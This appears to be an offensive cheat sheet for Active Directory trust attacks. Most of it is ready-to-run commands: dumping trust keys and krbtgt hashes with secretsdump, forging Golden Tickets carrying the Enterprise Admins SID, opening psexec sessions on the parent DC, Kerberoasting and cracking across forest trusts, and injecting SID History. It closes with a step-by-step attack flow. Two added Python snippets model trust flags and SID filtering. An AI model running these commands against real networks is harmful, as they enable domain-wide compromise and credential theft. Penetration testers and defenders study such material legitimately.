Domain and Forest Trust Attacks

Trust enumeration, cross-domain attacks, SID history abuse, trust key extraction, inter-forest Kerberoasting, PAM trust abuse, and foreign group membership exploitation.

You have compromised one domain and want to pivot to another through trust relationships. Trusts define how authentication flows between domains and forests. Parent-child trusts within a forest are bidirectional and transitive by default, giving you a direct path to the forest root.


Trust Fundamentals

Trust Type        | Direction                | Transitivity   | Scope          | Attack Path
Parent-Child      | Bidirectional            | Transitive     | Intra-forest   | SID History, Golden Ticket with extra SIDs
Tree-Root         | Bidirectional            | Transitive     | Intra-forest   | Same as parent-child
Forest (External) | One-way or Bidirectional | Non-transitive | Inter-forest   | Limited by SID filtering
Shortcut          | Bidirectional            | Transitive     | Intra-forest   | Same as parent-child
Realm (MIT)       | One-way or Bidirectional | Non-transitive | Kerberos realm | Trust key abuse

Within a forest, all domains trust each other implicitly. Compromising any domain in the forest gives you a path to the forest root through the parent-child trust. SID filtering is not enforced on intra-forest trusts, so SID History injection works.

Trust Enumeration

Remote (Linux)

terminal
# NetExec - enumerate trusts
root@localhost:~# netexec ldap 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' -M enum_trusts

# ldapsearch - trust objects
root@localhost:~# ldapsearch -x -H ldap://10.10.11.35 -D "svc_backup@corp.local" -w 'P@ssw0rd123' \
  -b "CN=System,DC=corp,DC=local" "(objectClass=trustedDomain)" cn trustDirection trustType trustAttributes flatName

# Impacket - enumerate trusts
root@localhost:~# impacket-lookupsid corp.local/svc_backup:'P@ssw0rd123'@10.10.11.35 -domain-sids

# rpcclient
root@localhost:~# rpcclient -U 'corp.local/svc_backup%P@ssw0rd123' 10.10.11.35 -c "enumtrust"
root@localhost:~# rpcclient -U 'corp.local/svc_backup%P@ssw0rd123' 10.10.11.35 -c "dsr_enumtrustdom"

Windows

powershell
# AD Module
PS C:\> Get-ADTrust -Filter * | Select-Object Name, Direction, TrustType, IntraForest, SIDFilteringForestAware, TGTDelegation

# PowerView
PS C:\> Get-DomainTrust
PS C:\> Get-DomainTrust -Domain child.corp.local
PS C:\> Get-ForestTrust
PS C:\> Get-ForestDomain

# nltest
PS C:\> nltest /domain_trusts /all_trusts /v

# .NET
PS C:\> ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
PS C:\> ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()

Trust Direction Reference

terminal
# trustDirection values in LDAP
# 0 = Disabled
# 1 = Inbound (they trust us - our users can access their resources)
# 2 = Outbound (we trust them - their users can access our resources)
# 3 = Bidirectional

# trustType values
# 1 = Windows NT (legacy)
# 2 = Active Directory
# 3 = MIT Kerberos realm

# trustAttributes flags (MS-ADTS names in brackets)
# 0x00000001 = Non-Transitive (NON_TRANSITIVE)
# 0x00000002 = Uplevel Only, Windows 2000+ (UPLEVEL_ONLY)
# 0x00000004 = SID Filtering Quarantined (QUARANTINED_DOMAIN)
# 0x00000008 = Forest Transitive, i.e. a forest trust (FOREST_TRANSITIVE)
# 0x00000010 = Cross-Organization, selective authentication (CROSS_ORGANIZATION)
# 0x00000020 = Intra-Forest (WITHIN_FOREST)
# 0x00000040 = Treat As External (TREAT_AS_EXTERNAL)
# 0x00000400 = PAM / bastion forest trust (PIM_TRUST)
# 0x00000800 = TGT delegation enabled across the trust (CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION)
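To turn the raw LDAP values above into something readable, here is an added Python example (not from the original page) that decodes trustedDomain entries in the shape ldapsearch prints them; the two entries embedded in it are constructed samples, and the SID-filtering reading is a simplified one derived from the flags listed above.

```python
TRUST_DIRECTION = {0: "Disabled", 1: "Inbound", 2: "Outbound", 3: "Bidirectional"}
TRUST_ATTRIBUTES = {0x0001: "NON_TRANSITIVE", 0x0002: "UPLEVEL_ONLY",  # MS-ADTS flag names
    0x0004: "QUARANTINED_DOMAIN", 0x0008: "FOREST_TRANSITIVE", 0x0010: "CROSS_ORGANIZATION",
    0x0020: "WITHIN_FOREST", 0x0040: "TREAT_AS_EXTERNAL", 0x0400: "PIM_TRUST",
    0x0800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION"}

# Constructed sample in the shape ldapsearch prints trustedDomain objects (not a real capture):
# an intra-forest child trust (32 = 0x20) and a one-way outbound forest trust (8 = 0x08).
SAMPLE_LDIF = """\
dn: CN=child.corp.local,CN=System,DC=corp,DC=local
cn: child.corp.local
flatName: CHILD
trustDirection: 3
trustAttributes: 32

dn: CN=partner.com,CN=System,DC=corp,DC=local
cn: partner.com
flatName: PARTNER
trustDirection: 2
trustAttributes: 8
"""

def parse_ldif(text):
    # Minimal LDIF reader: entries are separated by blank lines, '#' lines are comments
    entries = []
    for block in text.strip().split("\n\n"):
        lines = [l for l in block.splitlines() if l and not l.startswith("#")]
        entries.append(dict(l.partition(": ")[::2] for l in lines))
    return entries

def sid_filtering_state(attrs):
    # Simplified reading of trustAttributes for SID History / extra-SID risk
    if attrs & 0x0020:
        return "none: intra-forest, SID History and extra SIDs are honoured"
    if attrs & 0x0004:
        return "quarantined: only SIDs of the trusted domain itself pass"
    if attrs & 0x0008:
        return "forest filtering: SIDs from outside the trusted forest are stripped"
    return "not quarantined: external trust may honour SID History"

def decode_trust(entry):
    attrs = int(entry["trustAttributes"])
    return {"name": entry["cn"], "flat": entry.get("flatName", ""),
            "direction": TRUST_DIRECTION.get(int(entry["trustDirection"]), "unknown"),
            "flags": [n for bit, n in TRUST_ATTRIBUTES.items() if attrs & bit],
            "sid_filtering": sid_filtering_state(attrs)}

def decode_trusts(text=SAMPLE_LDIF):
    return [decode_trust(e) for e in parse_ldif(text)]
```

Feed it the output of the ldapsearch query above (saved to a file) to get one decoded record per trust; the flat name is also the sAMAccountName prefix of the trust account (CHILD$, PARTNER$).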

Foreign Group Membership and Users

Identify users from one domain that have been added to groups in another domain. These are direct cross-domain access paths.

powershell
# PowerView - find foreign group members (users from other domains in our groups)
PS C:\> Get-DomainForeignGroupMember | Select-Object GroupDomain, GroupName, MemberDomain, MemberName

# Find foreign users (users from other domains with access to our domain)
PS C:\> Get-DomainForeignUser | Select-Object UserDomain, UserName, GroupDomain, GroupName

# Find users from child.corp.local in corp.local groups
PS C:\> Get-DomainGroupMember -Domain corp.local | Where-Object {$_.MemberDomain -ne "corp.local"} | Select-Object GroupName, MemberName, MemberDomain

terminal
# ldapsearch - find foreign principals in groups
root@localhost:~# ldapsearch -x -H ldap://10.10.11.35 -D "svc_backup@corp.local" -w 'P@ssw0rd123' \
  -b "DC=corp,DC=local" "(objectClass=foreignSecurityPrincipal)" cn

# BloodHound CE - foreign membership edges
MATCH p=(u)-[:MemberOf]->(g) WHERE u.domain <> g.domain RETURN p

Parent-Child Trust Escalation (Intra-Forest)

Within a forest, parent-child trusts do not enforce SID filtering. If you compromise a child domain, you can forge a Golden Ticket with the Enterprise Admins SID in the extra SIDs field and escalate to the forest root.

Extract the Trust Key

The trust key is the shared secret between the two domains. You can also use the child domain’s krbtgt hash.

terminal
# DCSync the trust account (its sAMAccountName is the parent domain's NetBIOS/flatName with a $ suffix, here CORP$)
root@localhost:~# impacket-secretsdump child.corp.local/Administrator:'P@ssw0rd123'@10.10.11.36 -just-dc-user 'CORP$'

# Or DCSync the krbtgt of the child domain
root@localhost:~# impacket-secretsdump child.corp.local/Administrator:'P@ssw0rd123'@10.10.11.36 -just-dc-user krbtgt

Forge a Golden Ticket with Extra SIDs

terminal
# Get the parent domain SID
root@localhost:~# impacket-lookupsid corp.local/svc_backup:'P@ssw0rd123'@10.10.11.35 0
# Parent SID: S-1-5-21-3842939050-3880317879-2865463114
# Enterprise Admins RID: 519

# Forge the ticket with extra SIDs using the child krbtgt hash
root@localhost:~# impacket-ticketer -nthash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \
  -domain-sid S-1-5-21-1234567890-1234567890-1234567890 \
  -domain child.corp.local \
  -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 \
  Administrator
root@localhost:~# export KRB5CCNAME=Administrator.ccache

# Access the parent domain DC
root@localhost:~# impacket-psexec corp.local/Administrator@dc01.corp.local -k -no-pass
root@localhost:~# impacket-secretsdump corp.local/Administrator@dc01.corp.local -k -no-pass -just-dc

The -extra-sid parameter (Mimikatz's /sids) adds the parent domain's Enterprise Admins SID (RID 519) to the ticket's ExtraSids field. Because SID filtering is not enforced on intra-forest trusts, the parent DC honors this SID and grants Enterprise Admin privileges.

Using the Trust Key Instead of krbtgt

terminal
# Inter-realm TGT using the trust key
root@localhost:~# impacket-ticketer -nthash <trust_key_hash> \
  -domain-sid S-1-5-21-1234567890-1234567890-1234567890 \
  -domain child.corp.local \
  -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 \
  -spn krbtgt/corp.local \
  Administrator
root@localhost:~# export KRB5CCNAME=Administrator.ccache
root@localhost:~# impacket-psexec corp.local/Administrator@dc01.corp.local -k -no-pass

Inter-Forest Attacks

Forest trusts enforce SID filtering, which strips non-native SIDs from tickets crossing the trust boundary. This blocks the extra SIDs technique. However, there are still attack paths.

Inter-Forest Kerberoasting

If a forest trust exists, authenticated users in one forest can request TGS tickets for SPNs in the trusted forest.

terminal
# Enumerate SPNs in the trusted forest
root@localhost:~# impacket-GetUserSPNs -target-domain partner.com corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35

# Request and crack TGS hashes from the trusted forest
root@localhost:~# impacket-GetUserSPNs -target-domain partner.com corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35 -request -outputfile partner_kerb.txt
root@localhost:~# hashcat -m 13100 partner_kerb.txt /usr/share/wordlists/rockyou.txt

powershell
# Rubeus - Kerberoast across trust
PS C:\> .\Rubeus.exe kerberoast /domain:partner.com /dc:dc01.partner.com /outfile:C:\Temp\partner_kerb.txt

Foreign Group Membership Abuse

If users from your domain are members of groups in the trusted forest, you can use those users to access resources in the other forest.

powershell
# Find our users in the trusted forest's groups
PS C:\> Get-DomainForeignGroupMember -Domain partner.com

# If svc_backup@corp.local is in "IT Admins" in partner.com:
PS C:\> Enter-PSSession -ComputerName srv01.partner.com -Credential (Get-Credential)

TGT Delegation Abuse

Some forest trusts have TGT Delegation enabled, which allows unconstrained delegation across the trust boundary.

powershell
# Check if TGT Delegation is enabled on the trust
PS C:\> Get-ADTrust -Filter * | Select-Object Name, TGTDelegation

# If TGTDelegation is True, unconstrained delegation attacks work across the trust
# Coerce authentication from the other forest and capture TGTs

SID History Across Trusts

Intra-Forest (No SID Filtering)

Within a forest, SID History is honored across trusts. Inject the Enterprise Admins SID of the root domain into a user in a child domain.

terminal
# bloodyAD - inject SID History
root@localhost:~# bloodyAD -d child.corp.local -u Administrator -p 'P@ssw0rd123' --host 10.10.11.36 add SIDHistory svc_backup 'S-1-5-21-3842939050-3880317879-2865463114-519'

Inter-Forest (SID Filtering Active)

SID filtering on forest trusts strips SIDs whose domain portion does not belong to the trusted forest, so direct SID History injection will not work. SIDs that do belong to the trusted domain pass through, which is why SID History still works for accounts within that forest's own scope.

SID filtering is surfaced as a trust attribute: the 0x00000004 (QUARANTINED_DOMAIN) flag means quarantine is enforced, and some organizations relax it (disable quarantine) for migration purposes. Check the trustAttributes value for this flag; if it is not set, SID filtering may be relaxed.
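As an added illustration (not from the original page) of why the intra-forest extra-SIDs path in the parent-child section works while the same trick fails across a forest trust, this Python model applies a simplified SID-filtering rule to a forged PAC. The corp.local and child domain SIDs are the ones used on this page, PARTNER_SID is a constructed placeholder for partner.com, and the real MS-ADTS filtering rules have more cases than shown here.

```python
PARENT_SID = "S-1-5-21-3842939050-3880317879-2865463114"   # corp.local (from the page)
CHILD_SID = "S-1-5-21-1234567890-1234567890-1234567890"    # child.corp.local (from the page)
PARTNER_SID = "S-1-5-21-1111111111-2222222222-3333333333"  # partner.com, constructed placeholder

ENTERPRISE_ADMINS_RID = 519

def split_sid(sid):
    """Return (domain SID, RID) for a domain SID, or (None, None) for well-known SIDs."""
    if not sid.startswith("S-1-5-21-"):
        return None, None
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)

def filter_pac_sids(sids, trusted_forest_domains, enforce):
    """Simplified SID filtering: when enforced, a SID survives only if its domain
    part belongs to the forest the ticket came from. Intra-forest trusts do not
    enforce it, so everything in the PAC (including ExtraSids) passes through."""
    if not enforce:
        return list(sids), []
    kept, stripped = [], []
    for sid in sids:
        domain, _ = split_sid(sid)
        (kept if domain in trusted_forest_domains else stripped).append(sid)
    return kept, stripped

def grants_enterprise_admin(kept, resource_domain_sid):
    """Would the resource domain see its own Enterprise Admins RID in the PAC?"""
    return any(split_sid(s) == (resource_domain_sid, ENTERPRISE_ADMINS_RID) for s in kept)

def intra_forest_case():
    # Golden ticket forged in child.corp.local with the parent's EA SID in ExtraSids
    pac = [CHILD_SID + "-500", CHILD_SID + "-513", PARENT_SID + "-519"]
    kept, stripped = filter_pac_sids(pac, {CHILD_SID}, enforce=False)
    return grants_enterprise_admin(kept, PARENT_SID), stripped

def forest_trust_case():
    # Same trick attempted from corp.local against partner.com over a forest trust
    pac = [PARENT_SID + "-500", PARENT_SID + "-513", PARTNER_SID + "-519"]
    kept, stripped = filter_pac_sids(pac, {PARENT_SID, CHILD_SID}, enforce=True)
    return grants_enterprise_admin(kept, PARTNER_SID), stripped
```

A DC that strips SIDs this way logs event 4675 (SIDs were filtered), which is worth alerting on as evidence of a cross-forest attempt.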

PAM Trust Abuse

Privileged Access Management (PAM) trusts are a special trust type introduced with Windows Server 2016 bastion forests. The bastion forest grants temporary group memberships using time-based (shadow) security principals.

powershell
# Enumerate PAM trusts
PS C:\> Get-ADTrust -Filter {TrustAttributes -band 0x400} | Select-Object Name, TrustAttributes

# Enumerate shadow security principals in the bastion forest
PS C:\> Get-ADObject -SearchBase "CN=Shadow Principal Configuration,CN=Services,$((Get-ADRootDSE).configurationNamingContext)" -Filter * -Properties * | Select-Object Name, member, msDS-ShadowPrincipalSid

If you compromise the bastion forest, you can create shadow principals that map to high-privilege groups in the production forest. Shadow principals with no expiry effectively give permanent access disguised as temporary PAM access.

Trust Attack Flow

1. Enumerate All Trusts
   Map every trust relationship from the compromised domain. Get the trust direction, type, transitivity, and SID filtering status for each trust.

2. Intra-Forest: Escalate to Forest Root
   If you are in a child domain, extract the krbtgt hash and forge a Golden Ticket with the Enterprise Admins SID in extra SIDs. SID filtering is not enforced within a forest.

3. Inter-Forest: Kerberoast Across the Trust
   Enumerate SPNs in the trusted forest and Kerberoast them. Crack the hashes to get plaintext passwords for accounts in the other forest.

4. Check Foreign Memberships
   Look for users from your domain in groups in the trusted forest (and vice versa). These provide direct access paths.

5. Check TGT Delegation
   If TGT Delegation is enabled on the trust, unconstrained delegation attacks work across the boundary. Coerce authentication and capture TGTs.